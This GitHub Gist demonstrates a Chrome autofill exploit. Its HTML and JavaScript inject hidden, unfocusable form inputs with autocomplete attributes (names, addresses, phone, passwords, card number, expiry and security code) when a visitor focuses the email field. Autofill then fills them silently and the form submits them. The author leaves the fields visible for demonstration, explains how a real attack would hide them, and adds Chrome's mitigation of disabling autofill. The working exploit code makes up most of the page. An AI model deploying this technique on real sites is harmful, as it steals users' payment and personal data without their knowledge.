Created
January 14, 2017 09:06
-
-
Save lacostenycoder/ef619fece24803a73289124b5ee59054 to your computer and use it in GitHub Desktop.
Chrome Autofill Exploit Example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title>Test Chrome Autofill Hack</title> | |
</head> | |
<style media="screen"> | |
.hidden { | |
/*display: none;*/ | |
} | |
</style> | |
<body> | |
<form action="/my-handling-form-page" method="post" id="form"> | |
<div> | |
<label for="name">Name:</label> | |
<input type="text" id="name" name="user_name" /> | |
</div> | |
<div> | |
<label for="mail">E-mail:</label> | |
<input type="email" id="email" name="user_mail" /> | |
</div> | |
<div> | |
<label for="msg">Message:</label> | |
<textarea id="msg" name="user_message"></textarea> | |
</div> | |
<div class="button"> | |
<button type="submit">Submit</button> | |
</div> | |
</form> | |
</body> | |
<script type="text/javascript"> | |
var autocompletes = ['name', 'honorific-prefix', 'given-name', | |
'additional-name', 'family-name', 'honorific-suffix', | |
'nickname', 'username', 'new-password', | |
'current-password', 'organization-title', 'organization', | |
'street-address', 'address-line1', 'address-line2', | |
'address-line3', 'address-level4', 'address-level3', | |
'address-level2', 'address-level1', 'country', | |
'country-name', 'postal-code', 'cc-name', 'cc-given-name', | |
'cc-additional-name', 'cc-family-name', 'cc-exp', | |
'cc-exp-month', 'cc-exp-year', 'cc-csc', 'cc-type', | |
'transaction-currency', 'transaction-amount', | |
'language', 'bday', 'bday-day', 'bday-month', | |
'bday-year', 'sex', 'url', 'photo', 'tel', | |
'tel-country-code', 'tel-national', | |
'tel-area-code', 'tel-local', 'tel-local-prefix', | |
'tel-local-suffix', 'tel-extension', 'impp' | |
]; | |
var emailField = document.getElementById('email'); | |
var form = document.getElementById('form'); | |
emailField.addEventListener('focus', function() { | |
var wrap = autocompletes.reduce(function(wrapper, field) { | |
var input = document.createElement('input'); | |
// Make them not focussable | |
input.tabIndex = -1; | |
input.autocomplete = field; | |
wrapper.appendChild(input); | |
return wrapper; | |
}, document.createElement('div')); | |
// Hide the wrapper | |
wrap.classList.add('hidden'); | |
form.appendChild(wrap); | |
// Inject the autocompletes once | |
this.removeEventListener('focus', arguments.callee); | |
}); | |
</script> | |
</html> |
Chrome's solution - disable autofill
Turn off Autofill
Open Chrome.
At the top right, click More Settings.
At the bottom, click Show advanced settings.
Under "Passwords and forms," uncheck "Enable Autofill to fill out web forms in a single click."
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
In this example I left the
.hidden
class visible so you could easily see what the form does when you allow autofill.However, if this were a real exploit, the user would never see the hidden fields auto-populate and when the form was submitted (via AJAX for example) it would include any fields that chrome autofill data had stored.